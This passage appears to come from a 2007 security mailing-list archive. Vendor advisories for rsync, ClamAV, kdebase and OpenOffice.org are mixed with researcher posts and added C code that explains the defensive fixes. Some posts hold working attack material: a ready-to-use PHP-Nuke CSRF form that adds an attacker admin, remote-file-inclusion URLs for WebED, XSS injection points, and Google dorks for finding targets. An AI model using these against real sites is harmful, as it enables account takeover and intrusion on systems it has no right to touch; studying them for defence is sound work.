     Replacing /opt/drd/lbin/get_system_info with $secure_directory/get_system_info.wrapper

   where $secure_directory is the path to the secure directory containing the script.

5. The script must be executed whenever a vulnerable version of the fileset Ignite-UX.MGMT-TOOLS or the fileset DRD.DRD-RUN is reinstalled.

MANUAL ACTIONS: Yes - NonUpdate
Use script in Resolution section to work around the vulnerability

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

HISTORY
Version: 1 (rev.1) - 20 August 2007 Initial release
Version: 2 (rev.2) - 12 September 2007 new script, corrected revision numbers

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]

It is
WebBatch Applications Cross Site Scripting Vulnerability
[HSC] WebBatch Applications Cross Site Scripting Vulnerability

This issue is due to a failure in the application to properly sanitize user-supplied input. Attackers may exploit this issue via a web client. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Hackers Center Security Group (http://www.hackerscenter.com)

Credit:   Doz
Risk:     Medium
Class:    Input Validation Error
Remote:   YES
Local:    N/A
Platform: Windows Servers
Vendor:   Wilson WindowWare, Inc
Product:  WebBatch
          http://winbatch.com/

Vulnerable Files: webbatch.exe

* Attackers can exploit these issues via a web client.

Exploits:

  /webcgi/webbatch.exe?XSS
  /webcgi/webbatch.exe?PATH/XSS

Remote System Info Exposure:

  /webcgi/webbatch.exe?dumpinputdata

Google Search: (webbatch.exe)

  http://www.google.com/search?hl=en&q=ext%3Aexe+inurl%3A%28%7Cwebbatch%7C%29&btnG=Search

Only by becoming an Ethical Hacker can you stop a Hacker. Learn without having to pay thousands! - http://kit.hackerscenter.com - The most comprehensive security pack you will ever find on the net!
SimplePHPBlog Hacking
How to hack a server with Simple PHP Blog by uploading an .htaccess file from the img_upload_cgi.php page. Tested on v0.4.9 by Demential

http://www.hackish.eu
mailto: [EMAIL PROTECTED]

video here: http://hackish.eu/video/phpblog.avi
vlc download: http://www.videolan.org/vlc/
Re: 0day: PDF pwns Windows
Impressive vulnerability, new. Not a 0day.

Not to start an argument again, but fact is, people stop calling everything a 0day unless it is, say WMF, ANI, etc. exploited in the wild without being known.

I don't like the mis-use of this buzzword.

Gadi.

On Thu, 20 Sep 2007, pdp (architect) wrote:

> http://www.gnucitizen.org/blog/0day-pdf-pwns-windows
>
> I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.
>
> The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place.
>
> My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected.
>
> A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon.
>
> cheers
>
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
Re: Security Advisory for Bugzilla 3.0.1 and 3.1.1
What about 2.20?
Re: 0day: PDF pwns Windows
> My upcoming research features everything regarding this and the issue you have already discussed.

really :).. which one... the one from last year?

On 9/20/07, Aditya K Sood [EMAIL PROTECTED] wrote:
> pdp (architect) wrote:
>> http://www.gnucitizen.org/blog/0day-pdf-pwns-windows
>>
>> I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.
>>
>> The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place.
>>
>> My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected.
>>
>> A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon.
>>
>> cheers
>
> Hi
>
> Your point is right. But there are a number of factors other than this in exploiting PDF in another sense. My latest research is working on the exploitation of PDF. Even if you look at the core, there are no restrictions on READ in PDF in most of the versions. Only outbound data is filtered to some extent. You can even read the /etc/passwd file from inside a PDF. Other infection vectors include infection through Local Area Networks through sharing and printing PDF docs and so on.
>
> My upcoming research features everything regarding this and the issue you have already discussed.
>
> Regards
> Aks
> http://ww.secniche.org

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
PhpBB Xs 2 profile.php Permanent Xss Vulnerability
+++ PhpBB Xs 2 profile.php Permanent Xss Vulnerability +++
#Found By Seph1roth
+++

[POST METHOD]

Corrupted page:   profile.php?mode=editprofile&cpl_mode=profile_info
Bugged Variable:  selfdes (the "Altre informazioni" field, Italian for "Other information")
Xss:              </textarea>[XSS STRING]
WebED-0.8999 Multiple Remote File Inclusion Vulnerability
--- Multiple Remote File Inclusion Vulnerability ---

# Found by : Seph1roth
# Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz

# Exploit:
# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]
# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]

---
PHP-Nuke add admin ALL Versions
Paste this code into an HTML page then link it to victim (victim must be admin)

  <iframe name="aiuto" frameborder="0" height="0" width="0"></iframe>
  <form name="Faiuto" action="http://VICTIMURL/nuke/admin.php" target="aiuto" method="POST">
    <input type="hidden" name="add_name" value="ATTACKER">
    <input type="hidden" name="add_aid" value="ATTACKER">
    <input type="hidden" name="add_email" value="[EMAIL PROTECTED]">
    <input type="hidden" name="add_url" value="YOURSITE">
    <input type="hidden" name="add_admlanguage" value="italian">
    <input type="hidden" name="add_radminsuper" value="1">
    <input type="hidden" name="add_pwd" value="YOURPASSWORD">
    <input type="hidden" name="op" value="AddAuthor">
    <input type="image" height="0" width="0">
  </form>
  <script>document.Faiuto.submit()</script>

You are admin now ;)

Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...
Re: 0day: PDF pwns Windows
pdp (architect) wrote:
> http://www.gnucitizen.org/blog/0day-pdf-pwns-windows
>
> I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one.
>
> The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place.
>
> My advice for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issue was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected.
>
> A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon.
>
> cheers

Hi

Your point is right. But there are a number of factors other than this in exploiting PDF in another sense. My latest research is working on the exploitation of PDF. Even if you look at the core, there are no restrictions on READ in PDF in most of the versions. Only outbound data is filtered to some extent. You can even read the /etc/passwd file from inside a PDF. Other infection vectors include infection through Local Area Networks through sharing and printing PDF docs and so on.

My upcoming research features everything regarding this and the issue you have already discussed.

Regards
Aks
http://ww.secniche.org
Vigile CMS v1.8 Multiple Remote XSS Vulnerability
# Name     : Vigile CMS v1.8 Multiple Remote XSS Vulnerability
# Download : http://www.itcms.it/
# Date     : 20-09-2007
# Author   : x0kster
# Mail     : [EMAIL PROTECTED]
# Note     : For this to work, the wiki or the download module must be installed on the site.
#
# PoCs :
#
# Wiki 1     : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&title=[XSS]
# Wiki 2     : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[WIKINAME]?title=[XSS]
# Download 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[DOWNLOADNAME]&cat=[XSS]
# Download 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[DOWNLOADNAME]/cat=[XSS]
#
#
# Dork : tutti i contenuti, notizie, e commenti sono anche opera degli utenti, ogni violazione sarà eliminata dietro segnalazione.
#        (Italian search string, kept verbatim so it still works as a dork: "all content, news and comments are also the work of users; any violation will be removed upon report.")
[ GLSA 200709-13 ] rsync: Two buffer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200709-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: rsync: Two buffer overflows
      Date: September 20, 2007
      Bugs: #189132
        ID: 200709-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Two user-assisted buffer overflow vulnerabilities have been discovered in rsync.

Background
==========

rsync is a file transfer program to keep remote directories synchronized.

Affected packages
=================

    -------------------------------------------------------------------
     Package            /  Vulnerable  /                    Unaffected
    -------------------------------------------------------------------
  1  net-misc/rsync          < 2.6.9-r3                     >= 2.6.9-r3

Description
===========

Sebastian Krahmer from the SUSE Security Team discovered two off-by-one errors in the function f_name() in file sender.c when processing overly long directory names.

Impact
======

A remote attacker could entice a user to synchronize a repository containing specially crafted directories, leading to the execution of arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All rsync users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/rsync-2.6.9-r3"

References
==========

  [ 1 ] CVE-2007-4091
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4091

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200709-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
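The GLSA above names the bug class (an off-by-one in a length check while building a path from an overly long directory name) but carries no code. The following is an added illustration of that class in C; it is not rsync's f_name() and the function and buffer names are assumptions made for the example. It shows the length check as the bug writes it (the terminating NUL is forgotten, so a path that exactly fills the buffer is accepted and the NUL lands one byte past the end) beside the corrected check and a join routine that never writes past the buffer.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added illustration of the off-by-one class described in GLSA 200709-13.
 * NOT rsync's code: offbyone_check_accepts, strict_check_accepts and
 * join_path_safe are names assumed for this example. */

/* Buggy bound: counts the characters of "dir/name" but not the NUL.
 * A result that fills the buffer exactly passes, and the terminator is
 * then written one byte past the end. Returns 1 when the check accepts. */
int offbyone_check_accepts(size_t dirlen, size_t namelen, size_t bufsz)
{
    return (dirlen + 1 + namelen > bufsz) ? 0 : 1;
}

/* Correct bound: one byte is reserved for the NUL terminator. */
int strict_check_accepts(size_t dirlen, size_t namelen, size_t bufsz)
{
    return (dirlen + 1 + namelen >= bufsz) ? 0 : 1;
}

/* Build "dir/name" into dst (capacity dstsz). Returns 0 on success and -1
 * when the result, including its NUL, would not fit. Never writes beyond
 * dst[dstsz - 1]. */
int join_path_safe(char *dst, size_t dstsz, const char *dir, const char *name)
{
    size_t dirlen = strlen(dir);
    size_t namelen = strlen(name);

    /* Guard the size_t sums themselves against wrapping, then apply the
     * strict bound so the terminator always has room. */
    if (dirlen > SIZE_MAX - 2 || namelen > SIZE_MAX - 2 - dirlen)
        return -1;
    if (!strict_check_accepts(dirlen, namelen, dstsz))
        return -1;

    memcpy(dst, dir, dirlen);
    dst[dirlen] = '/';
    memcpy(dst + dirlen + 1, name, namelen);
    dst[dirlen + 1 + namelen] = '\0';
    return 0;
}

int main(void)
{
    char small[10];   /* "abcde/wxyz" is 10 characters: no room for the NUL */
    char big[11];

    printf("buggy check accepts 5+1+4 into 10 bytes:  %d\n",
           offbyone_check_accepts(5, 4, sizeof small));
    printf("strict check accepts 5+1+4 into 10 bytes: %d\n",
           strict_check_accepts(5, 4, sizeof small));
    printf("join into 10 bytes: %d\n",
           join_path_safe(small, sizeof small, "abcde", "wxyz"));
    if (join_path_safe(big, sizeof big, "abcde", "wxyz") == 0)
        printf("join into 11 bytes: %s\n", big);
    return 0;
}
```

The first two printed lines are the whole bug: with a 10-byte buffer the buggy check accepts a 10-character path, while the strict check rejects it. Compiling with `-fsanitize=address` and calling a join routine built on the buggy check is how such a write would surface in testing.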
rPSA-2007-0194-1 kdebase
rPath Security Advisory: 2007-0194-1
Published: 2007-09-20
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
    Local Root Deterministic Unauthorized Access
Updated Versions:
    kdebase=/[EMAIL PROTECTED]:devel//1/3.4.2-3.14-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1725

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4569

Description:
    Previous versions of the kdebase package contain a kdm vulnerability in which an unprivileged user may, if auto-login is enabled, be allowed to log in as another user (or as root) without supplying proper login credentials. If kdm is also configured to service incoming XDMCP requests, remote root unauthorized access may be possible.

    In its default configuration, rPath Linux 1 is not vulnerable to this unauthorized access.

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html
[ MDKSA-2007:186 ] - Updated openoffice.org packages fix TIFF parser vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2007:186
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : openoffice.org
 Date    : September 17, 2007
 Affected: 2007.0, 2007.1, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 An integer overflow in the TIFF parser in OpenOffice.org prior to version 2.3 allows remote attackers to execute arbitrary code via a TIFF file with crafted values which triggers the allocation of an incorrect amount of memory, which results in a heap-based buffer overflow.

 Updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2834
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.0:
 a4d81424938e8f51451b422cf84eca3e  2007.0/i586/openoffice.org-2.0.4-2.6mdv2007.0.i586.rpm
 c7cfae30e45b58b6f826a467aac6c464  2007.0/i586/openoffice.org-devel-2.0.4-2.6mdv2007.0.i586.rpm
 0b7444dd2eb7e9c527440404d87c4de0  2007.0/i586/openoffice.org-devel-doc-2.0.4-2.6mdv2007.0.i586.rpm
 cf856763e033e016112db04298055901  2007.0/i586/openoffice.org-galleries-2.0.4-2.6mdv2007.0.i586.rpm
 3b5e3e3f255e5de7f91b479256c7ffe2  2007.0/i586/openoffice.org-gnome-2.0.4-2.6mdv2007.0.i586.rpm
 d3b1815e496804d46fe3da2c57118c54  2007.0/i586/openoffice.org-kde-2.0.4-2.6mdv2007.0.i586.rpm
 a68cd22f05465911153f2b768e3b9258  2007.0/i586/openoffice.org-l10n-af-2.0.4-2.6mdv2007.0.i586.rpm
 1aaef2f8996dc632427eb8e6fbed2838  2007.0/i586/openoffice.org-l10n-ar-2.0.4-2.6mdv2007.0.i586.rpm
 b5d755dc3276d506dd0a3f9c4818b1a9  2007.0/i586/openoffice.org-l10n-bg-2.0.4-2.6mdv2007.0.i586.rpm
 313211a1c180fba5b3a09863aa1a58c0  2007.0/i586/openoffice.org-l10n-br-2.0.4-2.6mdv2007.0.i586.rpm
 50aab14a093c2c590bee2ab49ac09534  2007.0/i586/openoffice.org-l10n-bs-2.0.4-2.6mdv2007.0.i586.rpm
 d38dce9bac2b5ee8fd95bab8bbaa9954  2007.0/i586/openoffice.org-l10n-ca-2.0.4-2.6mdv2007.0.i586.rpm
 dce2af3766f2531cf5e7170971877d3f  2007.0/i586/openoffice.org-l10n-cs-2.0.4-2.6mdv2007.0.i586.rpm
 f7bf25d2c4cd966ba149b5046a7f0f20  2007.0/i586/openoffice.org-l10n-cy-2.0.4-2.6mdv2007.0.i586.rpm
 9795689550c442cc73d896fcf94308bb  2007.0/i586/openoffice.org-l10n-da-2.0.4-2.6mdv2007.0.i586.rpm
 729a20d3aba6b7229d44aac31d6aeb03  2007.0/i586/openoffice.org-l10n-de-2.0.4-2.6mdv2007.0.i586.rpm
 a91c27612ab8d13aea02056fb5507eb4  2007.0/i586/openoffice.org-l10n-el-2.0.4-2.6mdv2007.0.i586.rpm
 372eaa95e9d3a01a658a3db5d1a4a1b5  2007.0/i586/openoffice.org-l10n-en_GB-2.0.4-2.6mdv2007.0.i586.rpm
 d95d301efc6c8686c948c1781d5571ab  2007.0/i586/openoffice.org-l10n-es-2.0.4-2.6mdv2007.0.i586.rpm
 af8317081d0ad527ec4c45db0eaf0f8c  2007.0/i586/openoffice.org-l10n-et-2.0.4-2.6mdv2007.0.i586.rpm
 93b373dac33c8c53a9ef9e1ec34574df  2007.0/i586/openoffice.org-l10n-eu-2.0.4-2.6mdv2007.0.i586.rpm
 b17930722ff857244d7c94f965f70ef7  2007.0/i586/openoffice.org-l10n-fi-2.0.4-2.6mdv2007.0.i586.rpm
 30bdc0252f1be35a663c204b5322f889  2007.0/i586/openoffice.org-l10n-fr-2.0.4-2.6mdv2007.0.i586.rpm
 1e26e7adccf5ba445bce6c7f642be0f5  2007.0/i586/openoffice.org-l10n-he-2.0.4-2.6mdv2007.0.i586.rpm
 6668d9efdef95f362a2b7741e9c37a37  2007.0/i586/openoffice.org-l10n-hi-2.0.4-2.6mdv2007.0.i586.rpm
 b58e47fbf541c4428cbfa7128d67e0dd  2007.0/i586/openoffice.org-l10n-hu-2.0.4-2.6mdv2007.0.i586.rpm
 12b4442a8a01b846f4f0f55bc61a2329  2007.0/i586/openoffice.org-l10n-it-2.0.4-2.6mdv2007.0.i586.rpm
 c812895ebede2613f2054d75f9b46dcf  2007.0/i586/openoffice.org-l10n-ja-2.0.4-2.6mdv2007.0.i586.rpm
 c83c4873ba5c93e41502581a33ef9eaf  2007.0/i586/openoffice.org-l10n-ko-2.0.4-2.6mdv2007.0.i586.rpm
 27a4b865b57e2e08274f5a8d49050612  2007.0/i586/openoffice.org-l10n-mk-2.0.4-2.6mdv2007.0.i586.rpm
 1877c9bf19a8f922007a278572103250  2007.0/i586/openoffice.org-l10n-nb-2.0.4-2.6mdv2007.0.i586.rpm
 5770df672d5ce0f244df4f137d3356aa  2007.0/i586/openoffice.org-l10n-nl-2.0.4-2.6mdv2007.0.i586.rpm
 c1f28b42c6001ea6cd0659880347755a  2007.0/i586/openoffice.org-l10n-nn-2.0.4-2.6mdv2007.0.i586.rpm
 9fb81f43add5b9a8fe612aa5b05735b7  2007.0/i586/openoffice.org-l10n-pl-2.0.4-2.6mdv2007.0.i586.rpm
 b1c4b5bdecff7ab2242ece96aa540b62  2007.0/i586/openoffice.org-l10n-pt-2.0.4-2.6mdv2007.0.i586.rpm
 7f8aa8f46ed109a3e9d63b8ad7d89311  2007.0/i586/openoffice.org-l10n-pt_BR-2.0.4-2.6mdv2007.0.i586.rpm
 ddbbf41dd54b1794356f560e4222cb0d  2007.0/i586/openoffice.org-l10n-ru-2.0.4-2.6mdv2007.0.i586.rpm
 002770cede8ccfe5b92c585d72955ae1  2007.0/i586/openoffice.org-l10n-sk-2.0.4-2.6mdv2007.0.i586.rpm
 acd074d4812fa4ee361363bc064c7d80  2007.0/i586/openoffice.org-l10n-sl-2.0.4-2.6mdv2007.0.i586.rpm
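The Mandriva advisory describes the mechanism in one sentence: crafted TIFF header values overflow the arithmetic that sizes the pixel buffer, so too little memory is allocated and the image data that follows overruns it. The block below is an added illustration of that bug class in C; it is not OpenOffice.org's TIFF parser, and `naive_image_bytes`, `checked_image_bytes` and `alloc_pixels` are names assumed for the example. It places the unchecked 32-bit computation beside a version that tests every multiplication before performing it.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added illustration of the integer-overflow-to-heap-overflow class in
 * MDKSA-2007:186 (CVE-2007-2834). NOT OpenOffice.org code; all names here
 * are assumptions made for this example. */

/* Unchecked arithmetic as a naive parser might write it. The product is
 * computed in 32 bits, so header values such as 65536 x 65536 wrap to 0
 * and a far-too-small buffer is allocated for the pixels that follow. */
uint32_t naive_image_bytes(uint32_t width, uint32_t height, uint32_t bits_per_pixel)
{
    return width * height * (bits_per_pixel / 8);
}

/* Checked version. Rejects zero or absurd dimensions, rounds the row size
 * up from bits to bytes, and tests each multiplication against SIZE_MAX
 * before doing it. Returns true and stores the byte count on success,
 * false if the size cannot be represented. */
bool checked_image_bytes(uint32_t width, uint32_t height,
                         uint32_t bits_per_pixel, size_t *out)
{
    if (width == 0 || height == 0 || bits_per_pixel == 0 || bits_per_pixel > 64)
        return false;

    size_t w = width;
    size_t bpp = bits_per_pixel;

    /* w * bpp + 7 must not wrap before the division by 8. */
    if (w > (SIZE_MAX - 7) / bpp)
        return false;
    size_t row_bytes = (w * bpp + 7) / 8;

    /* row_bytes * height must not wrap either. */
    if (row_bytes > SIZE_MAX / height)
        return false;

    *out = row_bytes * height;
    return true;
}

/* Allocate the pixel buffer only when the size computation is sound;
 * a NULL return is the parser's signal to reject the file. */
unsigned char *alloc_pixels(uint32_t width, uint32_t height, uint32_t bpp)
{
    size_t n;
    if (!checked_image_bytes(width, height, bpp, &n))
        return NULL;
    return malloc(n);
}

int main(void)
{
    size_t n = 0;

    /* Constructed header values chosen to wrap 32-bit arithmetic. */
    printf("naive   65536x65536x8bpp  -> %u bytes (wrapped)\n",
           (unsigned)naive_image_bytes(65536u, 65536u, 8u));
    printf("checked 100x100x24bpp     -> %s, %zu bytes\n",
           checked_image_bytes(100u, 100u, 24u, &n) ? "ok" : "rejected", n);
    printf("checked 0xFFFFFFFF^2x32bpp -> %s\n",
           checked_image_bytes(0xFFFFFFFFu, 0xFFFFFFFFu, 32u, &n) ? "ok" : "rejected");

    unsigned char *px = alloc_pixels(100u, 100u, 24u);
    if (px) {
        printf("allocated %zu bytes for a 100x100x24bpp image\n", n);
        free(px);
    }
    return 0;
}
```

The naive function is the defect and the checked function the fix; a parser that also bounds dimensions to what it is willing to decode (rather than only to what fits in `size_t`) closes the remaining denial-of-service avenue of a legitimately huge allocation.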
[ GLSA 200709-14 ] ClamAV: Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200709-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: ClamAV: Multiple vulnerabilities
      Date: September 20, 2007
      Bugs: #189912
        ID: 200709-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Vulnerabilities have been discovered in ClamAV allowing remote execution of arbitrary code and Denial of Service attacks.

Background
==========

Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  app-antivirus/clamav         < 0.91.2                    >= 0.91.2

Description
===========

Nikolaos Rangos discovered a vulnerability in ClamAV which exists because the recipient address extracted from email messages is not properly sanitized before being used in a call to popen() when executing sendmail (CVE-2007-4560). Also, NULL-pointer dereference errors exist within the cli_scanrtf() function in libclamav/rtf.c and Stefanos Stamatis discovered a NULL-pointer dereference vulnerability within the cli_html_normalise() function in libclamav/htmlnorm.c (CVE-2007-4510).

Impact
======

The unsanitized recipient address can be exploited to execute arbitrary code with the privileges of the clamav-milter process by sending an email with a specially crafted recipient address to the affected system. Also, the NULL-pointer dereference errors can be exploited to crash ClamAV. Successful exploitation of the latter vulnerability requires that clamav-milter is started with the black hole mode activated, which is not enabled by default.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ClamAV users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.91.2"

References
==========

  [ 1 ] CVE-2007-4510
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4510
  [ 2 ] CVE-2007-4560
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4560

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200709-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFG8utnuhJ+ozIKI5gRAmMkAKCDDq+kFKHDaDbdWWWyHd7UcWISQwCbB+39
/DA8NxuOjBKxEw0ESjw2bgY=
=QLPG
-END PGP SIGNATURE-
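The CVE-2007-4560 half of the GLSA is a shell-injection pattern: a string taken from the message (the recipient address) is spliced into a command line that popen() hands to /bin/sh. The block below is an added C illustration of the defence, not clamav-milter's code; `recipient_is_safe`, `build_shell_command` and `build_sendmail_argv` are names assumed for the example. It shows the command-string construction the advisory describes beside the two controls that remove the risk: a strict character whitelist on the address, and passing the address as a single argv entry to an exec-style call so that no shell ever parses it.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added illustration of the defence for the popen() issue in GLSA 200709-14
 * (CVE-2007-4560). NOT ClamAV code; all names are assumptions for this
 * example. Nothing here executes a process; it only builds the inputs. */

/* Characters accepted in a recipient address handed to the MTA. The set
 * deliberately omits whitespace, quotes and every shell metacharacter. */
static const char ALLOWED[] =
    "abcdefghijklmnopqrstuvwxyz"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789.-_+=@";

/* Accept only addresses built from ALLOWED, of sane length, with exactly
 * one '@' that is neither first nor last, and not beginning with '-' so the
 * MTA cannot read the address as a command-line option. */
bool recipient_is_safe(const char *addr)
{
    size_t len = addr ? strlen(addr) : 0;
    if (len == 0 || len > 254 || addr[0] == '-')
        return false;

    const char *at = strchr(addr, '@');
    if (at == NULL || at == addr || at[1] == '\0' || strchr(at + 1, '@') != NULL)
        return false;

    return strspn(addr, ALLOWED) == len;
}

/* The pattern the advisory describes: the address is concatenated into one
 * string that popen() would pass to /bin/sh -c. Any metacharacter in addr
 * becomes shell syntax. Built here only for comparison, never run. */
int build_shell_command(char *out, size_t outsz, const char *addr)
{
    int n = snprintf(out, outsz, "/usr/sbin/sendmail -i %s", addr);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* The safer pattern: an argv vector for fork()/execv(). The address is one
 * argument, so the shell is never involved and metacharacters stay literal.
 * Validation is still applied so an address cannot masquerade as an option.
 * Returns the number of entries filled (excluding the NULL terminator), or
 * -1 if the address fails validation or argv is too small. */
int build_sendmail_argv(const char *addr, const char *argv[], size_t argvsz)
{
    if (argvsz < 4 || !recipient_is_safe(addr))
        return -1;
    argv[0] = "/usr/sbin/sendmail";
    argv[1] = "-i";
    argv[2] = addr;
    argv[3] = NULL;
    return 3;
}

int main(void)
{
    /* Constructed sample addresses: one well-formed, one carrying a shell
     * separator, one shaped like an option. */
    const char *samples[] = { "user@example.com", "user@example.com;id", "-flag@example.com" };
    char cmd[256];
    const char *av[4];

    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("%-24s safe=%d", samples[i], recipient_is_safe(samples[i]));
        if (build_shell_command(cmd, sizeof cmd, samples[i]) == 0)
            printf("  shell-string=\"%s\"", cmd);
        printf("  argv=%s\n", build_sendmail_argv(samples[i], av, 4) == 3 ? "built" : "refused");
    }
    return 0;
}
```

The printed shell strings make the problem visible: the string form carries the separator straight into whatever /bin/sh would parse, while the argv form refuses the address before any process is started. Both controls together are the usual fix; the whitelist alone would also have blocked the reported issue, but exec with argv removes the entire class rather than one metacharacter set.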